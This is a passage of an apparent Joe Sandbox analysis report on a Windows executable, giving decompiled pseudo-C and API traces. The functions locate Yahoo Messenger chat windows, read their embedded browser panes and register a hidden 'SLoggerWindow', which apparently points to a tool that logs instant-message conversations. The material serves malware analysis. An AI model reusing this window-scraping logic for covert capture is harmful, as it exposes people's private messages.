				intOrPtr* _t85;
				intOrPtr* _t86;
				intOrPtr _t91;
				void* _t93;

				E0043E4E0(0x43fff3, _t93);
				_push(__ecx);
				_push(__ecx);
				_t91 = __ecx;
				 *((intOrPtr*)(_t93 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x446940;
				_t84 = 0;
				 *(_t93 - 4) = 0xd;
				if( *((intOrPtr*)(__ecx + 0x47c)) > 0) {
					do {
						_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 0x478)) + _t84 * 4));
						if(_t62 != 0) {
							L0043DD36();
							_push(_t62);
							L0043DD42();
						}
						_t84 = _t84 + 1;
					} while (_t84 <  *((intOrPtr*)(_t91 + 0x47c)));
				}
				_t85 = _t91 + 0x4c4;
				 *((intOrPtr*)(_t93 - 0x14)) = _t85;
				 *_t85 = 0x445440;
				 *(_t93 - 4) = 0xe;
				L0043DD72();
				 *_t85 = 0x44547c;
				_t86 = _t91 + 0x4a8;
				 *((intOrPtr*)(_t93 - 0x14)) = _t86;
				 *_t86 = 0x446a2c;
				 *(_t93 - 4) = 0xf;
				E0040DF39(_t86);
				 *_t86 = 0x44547c;
				 *(_t93 - 4) = 0xa;
				L0043DD36();
				 *(_t93 - 4) = 9;
				L0043DD36();
				 *(_t93 - 4) = 8;
				L0043E1DA();
				 *(_t93 - 4) = 7;
				L0043E1E0();
				 *(_t93 - 4) = 6;
				_t50 = E0040E116(_t91 + 0x3c4);
				 *(_t93 - 4) = 5;
				_t51 = L00404F36(_t50, _t91 + 0x370, _t91);
				 *(_t93 - 4) = 4;
				_t52 = L00404F36(_t51, _t91 + 0x31c, _t91);
				 *(_t93 - 4) = 3;
				L00404F36(_t52, _t91 + 0x2c8, _t91);
				 *(_t93 - 4) = 2;
				L0043DF70();
				_t87 = _t91 + 0x174;
				 *((intOrPtr*)(_t93 - 0x14)) = _t91 + 0x174;
				 *(_t93 - 4) = 0x10;
				_t54 = L00403FBC(_t91 + 0x250);
				 *(_t93 - 4) = 1;
				L00404083(_t54, _t87, _t91);
				_t88 = _t91 + 0x60;
				 *((intOrPtr*)(_t93 - 0x14)) = _t91 + 0x60;
				 *(_t93 - 4) = 0x11;
				_t56 = L00403FBC(_t91 + 0x13c);
				 *(_t93 - 4) =  *(_t93 - 4) & 0x00000000;
				_t57 = L00404083(_t56, _t88, _t91);
				 *(_t93 - 4) =  *(_t93 - 4) | 0xffffffff;
				L0043E04E();
				 *[fs:0x0] =  *((intOrPtr*)(_t93 - 0xc));
				return _t57;
			}

0x0040d3fb
0x0040d400
0x0040d401
0x0040d404
0x0040d407
0x0040d40a
0x0040d410
0x0040d412
0x0040d41f
0x0040d421
0x0040d427
0x0040d42c
0x0040d431
0x0040d436
0x0040d437
0x0040d43c
0x0040d43d
0x0040d43e
0x0040d421
0x0040d446
0x0040d44c
0x0040d44f
0x0040d457
0x0040d45b
0x0040d465
0x0040d467
0x0040d46d
0x0040d470
0x0040d478
0x0040d47c
0x0040d487
0x0040d489
0x0040d48d
0x0040d498
0x0040d49c
0x0040d4a7
0x0040d4ab
0x0040d4b6
0x0040d4ba
0x0040d4c5
0x0040d4c9
0x0040d4d4
0x0040d4d8
0x0040d4e3
0x0040d4e7
0x0040d4f2
0x0040d4f6
0x0040d501
0x0040d505
0x0040d50a
0x0040d510
0x0040d519
0x0040d51d
0x0040d524
0x0040d528
0x0040d52d
0x0040d530
0x0040d539
0x0040d53d
0x0040d542
0x0040d548
0x0040d54d
0x0040d553
0x0040d55e
0x0040d566

APIs

__EH_prolog.LIBCMT ref: 0040D3FB
#800.MFC42(?,?,?,?,?,0040D3E2), ref: 0040D431
#825.MFC42(?,?,?,?,?,?,0040D3E2), ref: 0040D437
#2414.MFC42(?,?,?,?,?,0040D3E2), ref: 0040D45B
#800.MFC42(?,?,?,?,?,0040D3E2), ref: 0040D48D
#800.MFC42(?,?,?,?,?,0040D3E2), ref: 0040D49C
#772.MFC42(?,?,?,?,?,0040D3E2), ref: 0040D4AB
#810.MFC42(?,?,?,?,?,0040D3E2), ref: 0040D4BA
#795.MFC42(?,?,?,?,?,0040D3E2), ref: 0040D505
#641.MFC42(?,?,?,?,?,0040D3E2), ref: 0040D553

Strings

|TD, xrefs: 0040D460

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#2414#641#772#795#810#825H_prolog
String ID: |TD
API String ID: 4227990352-231495167
Opcode ID: bd5cb83daa1ad7b3e0f461ddc6411412d74bb2d4e719664e24794abdab7d26fd
Instruction ID: 6b85f4952407323f8866d637a9f4d6d98e82e9ff6b6d18cef21f2b851790c2c3
Opcode Fuzzy Hash: bd5cb83daa1ad7b3e0f461ddc6411412d74bb2d4e719664e24794abdab7d26fd
Instruction Fuzzy Hash: BB4181B0901785DAD714DBA5C1417DDFBF4AFA5308F10459ED49A232C2CBB82B08C726

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACF5, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040ACF5(intOrPtr __ecx, void* __eflags) {
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t32;
				CHAR* _t52;
				void* _t54;

				E0043E4E0(0x43fbc4, _t54);
				_push(__ecx);
				_push(__ecx);
				_t52 = "Internet Explorer_Server";
				 *((intOrPtr*)(_t54 - 0x10)) = __ecx;
				 *((intOrPtr*)(_t54 - 0x14)) = 0;
				_t24 = E0040FF68( *(_t54 + 0xc), 0, "YHTMLContainer", 0, _t52, 0);
				_push(0);
				if(_t24 == 0) {
					if(FindWindowExA( *(_t54 + 0xc), 0, "IMClass", ??) == 0) {
						L8:
						_push(0x4550cc);
						L0043DE26();
					} else {
						_t27 = E0040FF68(_t25, 0, "YHTMLContainer", 0, _t52, 0);
						if(_t27 == 0) {
							goto L8;
						} else {
							_push(FindWindowExA(_t27, 0, _t52, 0));
							_push(_t54 + 0xc);
							E00409B7F( *((intOrPtr*)(_t54 - 0x10)));
							 *(_t54 - 4) = 0;
							_t32 =  *((intOrPtr*)( *(_t54 + 0xc) - 8));
							if(_t32 <= 4) {
								_push(_t54 + 0xc);
								L0043DD3C();
							} else {
								_push(_t32 + 0xfffffffd);
								_push( *((intOrPtr*)(_t54 + 8)));
								L0043DFD0();
							}
							 *(_t54 - 4) =  *(_t54 - 4) | 0xffffffff;
							L0043DD36();
						}
					}
				} else {
					_push(FindWindowExA(_t24, 0, _t52, ??));
					_push( *((intOrPtr*)(_t54 + 8)));
					E00409B7F( *((intOrPtr*)(_t54 - 0x10)));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t54 - 0xc));
				return  *((intOrPtr*)(_t54 + 8));
			}

0x0040acfa
0x0040acff
0x0040ad00
0x0040ad06
0x0040ad15
0x0040ad1b
0x0040ad1e
0x0040ad28
0x0040ad29
0x0040ad56
0x0040adba
0x0040adbd
0x0040adc2
0x0040ad58
0x0040ad5e
0x0040ad68
0x00000000
0x0040ad6a
0x0040ad77
0x0040ad7b
0x0040ad7c
0x0040ad84
0x0040ad87
0x0040ad8d
0x0040ada6
0x0040ada7
0x0040ad8f
0x0040ad95
0x0040ad96
0x0040ad99
0x0040ad99
0x0040adac
0x0040adb3
0x0040adb3
0x0040ad68
0x0040ad2b
0x0040ad37
0x0040ad38
0x0040ad3b
0x0040ad3b
0x0040add0
0x0040add8

APIs

__EH_prolog.LIBCMT ref: 0040ACFA

Part of subcall function 0040FF68: FindWindowExA.USER32 ref: 0040FF7F
Part of subcall function 0040FF68: FindWindowExA.USER32 ref: 0040FF90

FindWindowExA.USER32 ref: 0040AD2E

Part of subcall function 00409B7F: __EH_prolog.LIBCMT ref: 00409B84
Part of subcall function 00409B7F: SendMessageTimeoutA.USER32(?,00000000,00000000,00000000,00000002,00000096,?), ref: 00409BA8
Part of subcall function 00409B7F: #537.MFC42(00000000,?), ref: 00409C20

FindWindowExA.USER32 ref: 0040AD4E
FindWindowExA.USER32 ref: 0040AD6E
#4129.MFC42(?,?,?,00000000), ref: 0040AD99
#800.MFC42(?,?,00000000), ref: 0040ADB3

Strings

Internet Explorer_Server, xrefs: 0040AD06, 0040AD0C, 0040AD2B, 0040AD59, 0040AD6B
YHTMLContainer, xrefs: 0040AD0D, 0040AD13, 0040AD5B
IMClass, xrefs: 0040AD45

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: FindWindow$H_prolog$#4129#537#800MessageSendTimeout
String ID: IMClass$Internet Explorer_Server$YHTMLContainer
API String ID: 2679677863-3466052522
Opcode ID: cbfb0505bd5ff32067bfed027ca958dd9ffec09b29c99b421f70ee8d457e02a3
Instruction ID: 9507c7077adb10eac93092fa8dbdadf757a6317969826f939f5394c173318484
Opcode Fuzzy Hash: cbfb0505bd5ff32067bfed027ca958dd9ffec09b29c99b421f70ee8d457e02a3
Instruction Fuzzy Hash: 3221D6B1900104BBCB10EF56DC49CAFBB3DEFC9765B10862FB815A6291D7389E00C669

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF63, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040EF63(intOrPtr __ecx) {
				intOrPtr _t49;
				intOrPtr _t50;
				void* _t53;
				char* _t57;
				void* _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;

				E0043E4E0(0x44026e, _t69);
				_t67 = __ecx;
				 *((intOrPtr*)(_t69 - 0x10)) = __ecx;
				 *(_t69 - 4) = 0;
				L0043DF64();
				_t57 = __ecx + 0x48;
				 *(_t69 - 4) = 1;
				 *_t57 =  *((intOrPtr*)(_t69 + 0xb));
				 *((char*)(_t57 + 1)) =  *((intOrPtr*)(_t69 + 0xb));
				 *((char*)(_t57 + 8)) = 0;
				E004105D6( *((intOrPtr*)(_t69 + 0xb)));
				 *(_t69 - 4) = 2;
				L0043DDD8();
				 *(_t69 - 4) = 3;
				 *((intOrPtr*)(__ecx)) = 0x446f60;
				 *((intOrPtr*)(__ecx + 0x40)) = 0;
				 *((char*)(__ecx + 0x44)) = 0;
				L0043DFCA();
				memset(_t69 - 0x48, 0, 0x28);
				 *(_t69 - 0x48) = 0;
				 *((intOrPtr*)(_t69 - 0x44)) = DefWindowProcA;
				L0043E1C2();
				 *((intOrPtr*)(_t69 - 0x34)) = 0;
				 *((intOrPtr*)(_t69 - 0x38)) =  *0x00000008;
				 *((intOrPtr*)(_t69 - 0x30)) = 0;
				 *((intOrPtr*)(_t69 - 0x2c)) = 6;
				 *((intOrPtr*)(_t69 - 0x28)) = 0;
				 *(_t69 - 0x24) = "SLoggerClass";
				L0043E270();
				_t49 = 5;
				 *((intOrPtr*)(_t69 - 0x20)) = _t49;
				 *((intOrPtr*)(_t69 - 0x1c)) = _t49;
				_t50 = 0x1e;
				 *((intOrPtr*)(_t69 - 0x18)) = _t50;
				 *((intOrPtr*)(_t69 - 0x14)) = _t50;
				L0043DEF8();
				__imp__CoInitialize(0,  *(_t69 - 0x24), "SLoggerWindow", 0, _t69 - 0x20,  *((intOrPtr*)(_t69 + 0xc)), 0x4d2, 0, _t69 - 0x48, _t69 + 8, _t63, _t66, _t53);
				 *(_t69 - 4) =  *(_t69 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t67 + 0x5c)) = 0xf;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t69 - 0xc));
				return _t67;
			}

0x0040ef68
0x0040ef72
0x0040ef75
0x0040ef7a
0x0040ef7d
0x0040ef85
0x0040ef88
0x0040ef8c
0x0040ef91
0x0040ef94
0x0040ef97
0x0040ef9f
0x0040efa5
0x0040efb0
0x0040efb4
0x0040efba
0x0040efbd
0x0040efc0
0x0040efcc
0x0040efd9
0x0040efdc
0x0040efdf
0x0040efe7
0x0040efea
0x0040eff1
0x0040eff4
0x0040effb
0x0040effe
0x0040f005
0x0040f00e
0x0040f011
0x0040f014
0x0040f017
0x0040f021
0x0040f024
0x0040f034
0x0040f03a
0x0040f040
0x0040f047
0x0040f04e
0x0040f05b
0x0040f063

APIs

__EH_prolog.LIBCMT ref: 0040EF68
#567.MFC42 ref: 0040EF7D

Part of subcall function 004105D6: #823.MFC42(00000040), ref: 004105E2
Part of subcall function 004105D6: ??0_Lockit@std@@QAE@XZ.MSVCP60 ref: 004105FC
Part of subcall function 004105D6: ??1_Lockit@std@@QAE@XZ.MSVCP60 ref: 00410626
Part of subcall function 004105D6: #825.MFC42(?), ref: 00410634
Part of subcall function 004105D6: #823.MFC42(00000040), ref: 00410642

#540.MFC42 ref: 0040EFA5
#858.MFC42(?), ref: 0040EFC0
memset.MSVCRT ref: 0040EFCC
#1168.MFC42 ref: 0040EFDF
#1232.MFC42(?), ref: 0040F005
#2124.MFC42(00453BC0,SLoggerWindow,00000000,?,?,000004D2,00000000,?), ref: 0040F034
CoInitialize.OLE32(00000000), ref: 0040F03A
#800.MFC42 ref: 0040F04E

Strings

SLoggerWindow, xrefs: 0040F02C

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #823Lockit@std@@$#1168#1232#2124#540#567#800#825#858??0_??1_H_prologInitializememset
String ID: SLoggerWindow
API String ID: 137274193-2554217539
Opcode ID: 901368f7e91618ae9ae689cf7cea8093a6089e54bfbc5b15bd697d8a1f4de3b0
Instruction ID: b45cb2e8fd06fa4ea6dbc9e53f194376a185aef7d77bda2344c2963643a349af
Opcode Fuzzy Hash: 901368f7e91618ae9ae689cf7cea8093a6089e54bfbc5b15bd697d8a1f4de3b0
Instruction Fuzzy Hash: E13180B0D01348AEDB00DFA5C881ADEBFB4FF08318F14446EE455A7282C7799A49CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040B4C1, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 70
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040B4C1(intOrPtr __ecx) {
				struct HWND__* _t38;
				struct HWND__* _t52;
				void* _t56;

				E0043E4E0(0x43fceb, _t56);
				 *((intOrPtr*)(_t56 - 0x18)) = __ecx;
				_t38 = 0;
				_push(0x4550cc);
				 *(_t56 - 0x1c) = 0;
				L0043DE26();
				 *(_t56 - 4) = 1;
				while(1) {
					_t38 = FindWindowExA( *(_t56 + 0xc), _t38, "__oxFrame.class__", 0);
					if(_t38 == 0) {
						break;
					}
					_t52 = FindWindowExA(_t38, 0, "Internet Explorer_Server", 0);
					if(_t52 != 0 && IsWindowVisible(_t52) != 0) {
						_push(_t52);
						_push(_t56 - 0x14);
						E00409B7F( *((intOrPtr*)(_t56 - 0x18)));
						 *(_t56 - 4) = 2;
						if( *((intOrPtr*)( *((intOrPtr*)(_t56 - 0x14)) - 8)) >  *((intOrPtr*)( *((intOrPtr*)(_t56 - 0x10)) - 8))) {
							_push(_t56 - 0x14);
							L0043DFCA();
						}
						 *(_t56 - 4) = 1;
						L0043DD36();
					}
				}
				_push(_t56 - 0x10);
				L0043DD3C();
				 *(_t56 - 0x1c) = 1;
				 *(_t56 - 4) =  *(_t56 - 4) & 0x00000000;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t56 - 0xc));
				return  *((intOrPtr*)(_t56 + 8));
			}

0x0040b4c6
0x0040b4d0
0x0040b4d4
0x0040b4d6
0x0040b4de
0x0040b4e1
0x0040b4ec
0x0040b4f3
0x0040b501
0x0040b505
0x00000000
0x00000000
0x0040b511
0x0040b515
0x0040b528
0x0040b529
0x0040b52a
0x0040b535
0x0040b53f
0x0040b547
0x0040b548
0x0040b548
0x0040b550
0x0040b554
0x0040b554
0x0040b515
0x0040b561
0x0040b562
0x0040b567
0x0040b56e
0x0040b575
0x0040b583
0x0040b58b

APIs

__EH_prolog.LIBCMT ref: 0040B4C6
#537.MFC42(004550CC), ref: 0040B4E1
FindWindowExA.USER32 ref: 0040B4FF
FindWindowExA.USER32 ref: 0040B50F
IsWindowVisible.USER32(00000000), ref: 0040B518
#858.MFC42(?,?,00000000), ref: 0040B548
#800.MFC42(?,00000000), ref: 0040B554
#535.MFC42(?), ref: 0040B562
#800.MFC42(?), ref: 0040B575

Strings

Internet Explorer_Server, xrefs: 0040B508
__oxFrame.class__, xrefs: 0040B4F6

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Window$#800Find$#535#537#858H_prologVisible
String ID: Internet Explorer_Server$__oxFrame.class__
API String ID: 868504759-2130105940
Opcode ID: de1ab3cd1415bd1dd9643439e70a4bf75231eb6a9a02cf578f4aaf1f8b4b78a3
Instruction ID: c7b46500d06fd80d29eacddbb276dd23fc7a63454924b9df6a3b0a18ece1216b
Opcode Fuzzy Hash: de1ab3cd1415bd1dd9643439e70a4bf75231eb6a9a02cf578f4aaf1f8b4b78a3
Instruction Fuzzy Hash: 96215671D0014AEACB10EFA5D995FBFBB78FB89704F10446EE411A3281D778AE04CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADDB, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61
stringCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040ADDB() {
				signed int _t18;
				void* _t22;
				signed int _t26;
				void* _t36;

				E0043E4E0(0x43fbd8, _t36);
				if(IsWindow( *(_t36 + 8)) == 0) {
					L7:
					_t18 = 0;
				} else {
					if(strncmp( *(_t36 + 0xc), "IMClass", 7) != 0) {
						if(strncmp( *(_t36 + 0xc), "YSearchMenuWndClass", 0x13) != 0) {
							goto L7;
						} else {
							_push( *(_t36 + 8));
							_push(_t36 + 8);
							_t22 = E0040FEA7();
							_t26 = 0;
							_push("Instant Message");
							 *(_t36 - 4) = 0;
							L0043DFD6();
							if(_t22 != 0xffffffff) {
								_t26 = 1;
							}
							 *(_t36 - 4) =  *(_t36 - 4) | 0xffffffff;
							L0043DD36();
							_t18 = _t26;
						}
					} else {
						_t18 = E0040FF68( *(_t36 + 8), 0, "YHTMLContainer", 0, "Internet Explorer_Server", 0) & 0xffffff00 | _t23 != 0x00000000;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t18;
			}

0x0040ade0
0x0040adf2
0x0040ae7c
0x0040ae7c
0x0040adf8
0x0040ae0f
0x0040ae43
0x00000000
0x0040ae45
0x0040ae45
0x0040ae4b
0x0040ae4c
0x0040ae53
0x0040ae55
0x0040ae5d
0x0040ae60
0x0040ae68
0x0040ae6a
0x0040ae6a
0x0040ae6c
0x0040ae73
0x0040ae78
0x0040ae78
0x0040ae11
0x0040ae2d
0x0040ae2d
0x0040ae0f
0x0040ae83
0x0040ae8b

APIs

__EH_prolog.LIBCMT ref: 0040ADE0
IsWindow.USER32(?), ref: 0040ADEA
strncmp.MSVCRT(?,IMClass,00000007), ref: 0040AE08
strncmp.MSVCRT(?,YSearchMenuWndClass,00000013), ref: 0040AE3C
#2764.MFC42(Instant Message), ref: 0040AE60
#800.MFC42(Instant Message), ref: 0040AE73

Part of subcall function 0040FF68: FindWindowExA.USER32 ref: 0040FF7F
Part of subcall function 0040FF68: FindWindowExA.USER32 ref: 0040FF90

Strings

YSearchMenuWndClass, xrefs: 0040AE34
Internet Explorer_Server, xrefs: 0040AE14
Instant Message, xrefs: 0040AE55
YHTMLContainer, xrefs: 0040AE1A
IMClass, xrefs: 0040AE00

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Window$Findstrncmp$#2764#800H_prolog
String ID: IMClass$Instant Message$Internet Explorer_Server$YHTMLContainer$YSearchMenuWndClass
API String ID: 3637711971-669420900
Opcode ID: c707bfecf86fe6d6df8b954859b7ed41a3bf4fde4fd87e9a8a77da242c93ee4e
Instruction ID: a8082ce531a0ae01416219cf90003906a59ee9abe53975e76382586ffc31f206
Opcode Fuzzy Hash: c707bfecf86fe6d6df8b954859b7ed41a3bf4fde4fd87e9a8a77da242c93ee4e
Instruction Fuzzy Hash: AB119471940208BBDB109F60DC82F9E7B189F15399F208137B815A61E1E7389F199699

Uniqueness

Uniqueness Score: -1.00%

Function 004257A8, Relevance: 18.1, APIs: 12, Instructions: 115
fileCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E004257A8(void* __eflags) {
				char _t44;
				intOrPtr* _t50;
				intOrPtr* _t53;
				intOrPtr* _t58;
				signed int _t71;
				void* _t90;
				void* _t92;
				void* _t94;

				E0043E4E0(0x4429f4, _t92);
				L0043DDD8();
				_push(_t92 - 0x34);
				 *(_t92 - 4) = 0;
				L0043E4A4();
				_t44 =  *0x4550cc; // 0x0
				 *((char*)(_t92 - 0xb4)) = _t44;
				_t71 = 0x1f;
				memset(_t92 - 0xb3, 0, _t71 << 2);
				asm("stosw");
				asm("stosb");
				E0042A943(_t92 - 0xb4);
				 *((intOrPtr*)(_t94 - 0xa8 + 0xc)) = 0xe03b;
				_push(_t92 - 0x18);
				_t50 = E00429029();
				 *(_t92 - 4) = 1;
				_t53 = E004290DB(0, _t92 - 0x14, _t92 - 0x34);
				 *(_t92 - 4) = 2;
				 *((intOrPtr*)(_t92 + 0xc)) = E00429098(0, _t92 - 0x20, _t92 - 0x34);
				 *(_t92 - 4) = 3;
				_t58 = E00429029(_t92 - 0x1c, 0xe054);
				_push( *_t50);
				 *(_t92 - 4) = 4;
				_push( *((intOrPtr*)(_t92 + 0x14)));
				_push(_t92 - 0xb4);
				_push( *((intOrPtr*)(_t92 + 0x10)));
				_push( *_t53);
				_push( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0xc)))));
				_push( *_t58);
				_push(_t92 - 0x10);
				L0043E174();
				 *(_t92 - 4) = 3;
				L0043DD36();
				 *(_t92 - 4) = 2;
				L0043DD36();
				 *(_t92 - 4) = 1;
				L0043DD36();
				 *(_t92 - 4) = 0;
				L0043DD36();
				_t90 = CreateFileA( *(_t92 + 8), 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t90 != 0xffffffff) {
